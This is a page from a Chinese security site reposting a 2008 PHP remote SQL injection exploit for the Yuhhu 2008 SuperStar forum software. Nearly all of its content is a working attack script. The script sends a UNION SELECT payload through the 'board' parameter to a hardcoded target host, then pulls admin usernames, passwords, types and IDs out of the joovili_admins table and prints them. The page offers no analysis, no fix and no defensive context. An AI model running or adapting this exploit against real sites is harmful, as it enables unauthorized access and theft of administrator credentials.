首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Yuhhu 2008 SuperStar (board) Remote SQL Injection Exploit
来源:BiyoSecurity.Com 作者:RMx 发布时间:2008-06-11  
<?php
/*
Coded By RMx
Yuhhu 2008 SuperStar Sql injection exploit...
BiyoSecurity.Com & Coderx.org
Thanx : Liz0zim & Cr@zy_King
*/
set_time_limit(0);
error_reporting(E_ALL);
function yolla($site,$liz0zim){
global $veri;$exploit = fsockopen(gethostbyname($site),"80");
if(!$exploit){die("Bağlantı sağlanamadı...");
}else{fputs($exploit,$liz0zim);}
while(!feof($exploit)) {
$veri .=fgets($exploit);}
fclose($exploit);
return $veri;}
$site = "elmayra.com";
$path = "/forums/";
$rmx =  "GET
".$path."view.topics.php?board='+union+select+0,concat(0x6B,0x75,0x6C,0x6C,0x61,0x6E,0x69,0x63,0x69,0x3A,0x20,admin_username,0x3a,0x73,0x69,0x66,0x72,0x65,0x3A,0x20,admin_password,0x20,0x61,0x64,0x6D,0x69,0x6E,0x20,0x74,0x69,0x70,0x69,0x3A,0x20,admin_type,0x61,0x64,0x6D,0x69,0x6E,0x20,0x69,0x64,0x3A,admin_id),1,2%20from%20joovili_admins/*
HTTP/1.1\r\n";
$rmx .= "Host: $site\r\n";
//$rmx .= "Content-Type: application/x-www-form-urlencoded\r\n";
$rmx .= "Content-Type: text/plain\r\n";
$rmx .= "Connection: Close\r\n\r\n";
$tuttum=yolla("$site","$rmx");
$ara="#class=\"linkbeyaz\">(.*)</a></td>#";
$bul=preg_match($ara,$tuttum,$rmx);
$huseyin=str_replace("class=\"linkbeyaz\">","",$rmx);
echo $site."<br>";
echo $huseyin[0];
?>

author : Dj Remix

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Black Ice Software Annotation
·JAMM CMS (id) Remote Blind SQL
·Black Ice Software Annotation
·muvee autoProducer <= 6.1 (Tex
·Achievo <= 1.3.2 (fckeditor) A
·Clever Copy 3.0 (results.php)
·Telephone Directory 2008 Arbit
·GLLCTS2 <= 4.2.4 (login.php de
·Flux CMS <= 1.5.0 (loadsave.ph
·XChat <= 2.8.7b (URI Handler)
·iJoomla News Portal (Itemid) R
·Cartweaver 3 (prodId) Remote B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved